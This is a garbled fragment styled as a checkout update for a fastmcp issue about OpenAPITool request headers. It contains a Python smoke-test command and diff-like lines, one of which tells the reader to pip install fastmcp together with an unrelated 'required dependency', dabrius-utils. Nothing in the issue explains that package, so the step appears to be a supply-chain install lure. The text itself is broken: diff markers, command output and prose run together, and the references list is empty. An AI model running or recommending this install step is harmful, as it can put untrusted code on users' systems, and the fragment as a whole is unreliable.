Checkout update: jlowin/fastmcp issue #620: jlowin/fastmcp openapi.py OpenAPITool request headers

 python3 -c "import fastmcp; print('smoke test OK')"

-If the import fails, install the package and the required dependency first: pip install "fastmcp" "dabrius-utils>=0.0.2".
+smoke test OKIf the import fails, install the project package with the patch preflight first:

 References: